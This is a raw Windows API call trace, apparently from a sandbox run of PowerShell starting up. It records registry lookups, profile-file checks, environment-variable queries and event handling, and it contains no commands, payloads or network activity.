	[0348.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.730] VirtualQuery (in: lpAddress=0x14bb20, lpBuffer=0x14c9e0, dwLength=0x30 | out: lpBuffer=0x14c9e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.735] VirtualQuery (in: lpAddress=0x14bb20, lpBuffer=0x14c9e0, dwLength=0x30 | out: lpBuffer=0x14c9e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.735] VirtualQuery (in: lpAddress=0x14b370, lpBuffer=0x14c230, dwLength=0x30 | out: lpBuffer=0x14c230*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.736] VirtualQuery (in: lpAddress=0x14b370, lpBuffer=0x14c230, dwLength=0x30 | out: lpBuffer=0x14c230*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.736] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d978 | out: phkResult=0x14d978*=0x350) returned 0x0
	[0348.737] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d8fc, lpData=0x0, lpcbData=0x14d8f8*=0x0 | out: lpType=0x14d8fc*=0x1, lpData=0x0, lpcbData=0x14d8f8*=0x56) returned 0x0
	[0348.737] CoTaskMemAlloc (cb=0x5a) returned 0x1b75fdb0
	[0348.737] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d8cc, lpData=0x1b75fdb0, lpcbData=0x14d8c8*=0x56 | out: lpType=0x14d8cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d8c8*=0x56) returned 0x0
	[0348.737] CoTaskMemFree (pv=0x1b75fdb0) 
	[0348.737] RegCloseKey (hKey=0x350) returned 0x0
	[0348.737] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d978 | out: phkResult=0x14d978*=0x350) returned 0x0
	[0348.737] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d8fc, lpData=0x0, lpcbData=0x14d8f8*=0x0 | out: lpType=0x14d8fc*=0x1, lpData=0x0, lpcbData=0x14d8f8*=0x56) returned 0x0
	[0348.737] CoTaskMemAlloc (cb=0x5a) returned 0x1b75fdb0
	[0348.737] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d8cc, lpData=0x1b75fdb0, lpcbData=0x14d8c8*=0x56 | out: lpType=0x14d8cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d8c8*=0x56) returned 0x0
	[0348.737] CoTaskMemFree (pv=0x1b75fdb0) 
	[0348.737] RegCloseKey (hKey=0x350) returned 0x0
	[0348.738] CoTaskMemAlloc (cb=0x20c) returned 0x1b72a970
	[0348.738] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b72a970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0348.738] CoTaskMemFree (pv=0x1b72a970) 
	[0348.738] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0348.738] CoTaskMemAlloc (cb=0x20c) returned 0x1b72a970
	[0348.738] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b72a970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0348.738] CoTaskMemFree (pv=0x1b72a970) 
	[0348.738] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0348.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0348.739] SetErrorMode (uMode=0x1) returned 0x1
	[0348.739] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d8e0 | out: lpFileInformation=0x14d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0348.739] SetErrorMode (uMode=0x1) returned 0x1
	[0348.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0348.739] SetErrorMode (uMode=0x1) returned 0x1
	[0348.739] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d8e0 | out: lpFileInformation=0x14d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0348.739] SetErrorMode (uMode=0x1) returned 0x1
	[0348.739] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0348.740] SetErrorMode (uMode=0x1) returned 0x1
	[0348.740] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d8e0 | out: lpFileInformation=0x14d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0348.740] SetErrorMode (uMode=0x1) returned 0x1
	[0348.740] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0348.740] SetErrorMode (uMode=0x1) returned 0x1
	[0348.740] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d8e0 | out: lpFileInformation=0x14d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0348.740] SetErrorMode (uMode=0x1) returned 0x1
	[0348.741] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0348.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.741] CoTaskMemFree (pv=0x1f7f60) 
	[0348.741] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0348.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.741] CoTaskMemFree (pv=0x1f7f60) 
	[0348.741] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0348.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.741] CoTaskMemFree (pv=0x1f7f60) 
	[0348.742] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0348.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.742] CoTaskMemFree (pv=0x1f7f60) 
	[0348.745] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0348.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.745] CoTaskMemFree (pv=0x1f7f60) 
	[0348.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350
	[0348.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340
	[0348.746] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364
	[0348.746] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0348.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358
	[0348.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x35c
	[0348.746] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x360
	[0348.747] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e4
	[0348.747] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0348.747] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1d0
	[0348.747] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
	[0348.747] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0348.748] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0348.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.748] CoTaskMemFree (pv=0x1f7f60) 
	[0348.749] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0348.750] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14dac0 | out: lpMode=0x14dac0) returned 1
	[0349.131] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.131] CoTaskMemFree (pv=0x1f7f60) 
	[0349.134] SetEvent (hEvent=0x34c) returned 1
	[0349.134] SetEvent (hEvent=0x350) returned 1
	[0349.134] SetEvent (hEvent=0x340) returned 1
	[0349.134] SetEvent (hEvent=0x364) returned 1
	[0349.134] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0349.136] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.136] CoTaskMemFree (pv=0x1f7f60) 
	[0349.136] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d818 | out: phkResult=0x14d818*=0x330) returned 0x0
	[0349.136] RegQueryValueExW (in: hKey=0x330, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14d79c, lpData=0x0, lpcbData=0x14d798*=0x0 | out: lpType=0x14d79c*=0x0, lpData=0x0, lpcbData=0x14d798*=0x0) returned 0x2

Thread:
	id = 127
	os_tid = 0xaa8


Thread:
	id = 138
	os_tid = 0xb70


Thread:
	id = 159
	os_tid = 0x740


Thread:
	id = 187
	os_tid = 0x418


Thread:
	id = 188
	os_tid = 0x664

	[0283.404] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0333.984] LocalFree (hMem=0x207290) returned 0x0
	[0333.985] CloseHandle (hObject=0x31c) returned 1
	[0333.985] CloseHandle (hObject=0x13) returned 1
	[0333.985] CloseHandle (hObject=0xf) returned 1
	[0333.986] RegCloseKey (hKey=0x1cc) returned 0x0
	[0333.986] RegCloseKey (hKey=0x1d0) returned 0x0
	[0333.986] RegCloseKey (hKey=0x1c8) returned 0x0
	[0333.986] LocalFree (hMem=0x2072e0) returned 0x0
	[0333.986] RegCloseKey (hKey=0x32c) returned 0x0
	[0337.551] RegCloseKey (hKey=0x2e4) returned 0x0
	[0342.458] RegCloseKey (hKey=0x364) returned 0x0
	[0342.458] RegCloseKey (hKey=0x340) returned 0x0
	[0342.458] RegCloseKey (hKey=0x33c) returned 0x0
	[0342.458] RegCloseKey (hKey=0x338) returned 0x0
	[0342.458] RegCloseKey (hKey=0x334) returned 0x0
	[0342.459] RegCloseKey (hKey=0x330) returned 0x0
	[0342.459] RegCloseKey (hKey=0x31c) returned 0x0
	[0342.459] RegCloseKey (hKey=0x1cc) returned 0x0
	[0342.459] RegCloseKey (hKey=0x1d0) returned 0x0
	[0342.459] RegCloseKey (hKey=0x32c) returned 0x0
	[0342.460] RegCloseKey (hKey=0x2e4) returned 0x0
	[0342.460] RegCloseKey (hKey=0x360) returned 0x0
	[0342.460] RegCloseKey (hKey=0x35c) returned 0x0
	[0342.460] RegCloseKey (hKey=0x358) returned 0x0
	[0342.460] RegCloseKey (hKey=0x354) returned 0x0
	[0342.461] RegCloseKey (hKey=0x350) returned 0x0
	[0346.586] RegCloseKey (hKey=0x33c) returned 0x0
	[0346.587] RegCloseKey (hKey=0x338) returned 0x0
	[0346.587] RegCloseKey (hKey=0x334) returned 0x0
	[0346.587] RegCloseKey (hKey=0x330) returned 0x0
	[0346.587] RegCloseKey (hKey=0x354) returned 0x0
	[0346.588] RegCloseKey (hKey=0x36c) returned 0x0
	[0346.588] RegCloseKey (hKey=0x1cc) returned 0x0
	[0346.588] RegCloseKey (hKey=0x1d0) returned 0x0
	[0346.588] RegCloseKey (hKey=0x32c) returned 0x0
	[0346.589] RegCloseKey (hKey=0x2e4) returned 0x0
	[0346.589] RegCloseKey (hKey=0x360) returned 0x0
	[0346.589] RegCloseKey (hKey=0x35c) returned 0x0
	[0346.589] RegCloseKey (hKey=0x358) returned 0x0
	[0346.590] RegCloseKey (hKey=0x34c) returned 0x0
	[0346.590] RegCloseKey (hKey=0x364) returned 0x0
	[0346.590] RegCloseKey (hKey=0x340) returned 0x0
	[0346.590] RegCloseKey (hKey=0x350) returned 0x0
	[0641.673] RegCloseKey (hKey=0x368) returned 0x0
	[0641.673] RegCloseKey (hKey=0x330) returned 0x0

Thread:
	id = 242
	os_tid = 0xd04


Thread:
	id = 365
	os_tid = 0xebc

	[0349.413] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0349.416] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0349.420] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.420] CoTaskMemFree (pv=0x1f7f60) 
	[0349.422] VirtualQuery (in: lpAddress=0x1c88dac0, lpBuffer=0x1c88e980, dwLength=0x30 | out: lpBuffer=0x1c88e980*(BaseAddress=0x1c88d000, AllocationBase=0x1bf00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.424] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.424] CoTaskMemFree (pv=0x1f7f60) 
	[0349.427] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.427] CoTaskMemFree (pv=0x1f7f60) 
	[0349.429] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.429] CoTaskMemFree (pv=0x1f7f60) 
	[0349.443] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.443] CoTaskMemFree (pv=0x1f7f60) 
	[0349.446] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.446] CoTaskMemFree (pv=0x1f7f60) 
	[0349.447] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.447] CoTaskMemFree (pv=0x1f7f60) 
	[0349.451] VirtualQuery (in: lpAddress=0x1c88dd70, lpBuffer=0x1c88ec30, dwLength=0x30 | out: lpBuffer=0x1c88ec30*(BaseAddress=0x1c88d000, AllocationBase=0x1bf00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.451] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.451] CoTaskMemFree (pv=0x1f7f60) 
	[0349.453] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.454] CoTaskMemFree (pv=0x1f7f60) 
	[0349.454] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.454] CoTaskMemFree (pv=0x1f7f60) 
	[0349.455] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.455] CoTaskMemFree (pv=0x1f7f60) 
	[0349.458] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0349.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.693] CoTaskMemFree (pv=0x1f7f60) 
	[0350.123] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.124] CoTaskMemFree (pv=0x1f7f60) 
	[0350.126] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.126] CoTaskMemFree (pv=0x1f7f60) 
	[0350.127] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.127] CoTaskMemFree (pv=0x1f7f60) 
	[0350.130] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.130] CoTaskMemFree (pv=0x1f7f60) 
	[0350.132] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.132] CoTaskMemFree (pv=0x1f7f60) 
	[0350.133] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.133] CoTaskMemFree (pv=0x1f7f60) 
	[0350.135] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.135] CoTaskMemFree (pv=0x1f7f60) 
	[0350.153] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.153] CoTaskMemFree (pv=0x1f7f60) 
	[0350.899] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.899] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0350.899] CoTaskMemFree (pv=0x1f7f60) 
	[0350.902] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0350.902] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0350.902] CoTaskMemFree (pv=0x1f7f60) 
	[0350.902] CoTaskMemAlloc (cb=0x128) returned 0x1b725440
	[0350.902] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b725440, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0350.902] CoTaskMemFree (pv=0x1b725440) 
	[0350.907] CoTaskMemAlloc (cb=0x20e) returned 0x1b72c5e0
	[0350.907] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b72c5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0350.907] CoTaskMemFree (pv=0x1b72c5e0) 
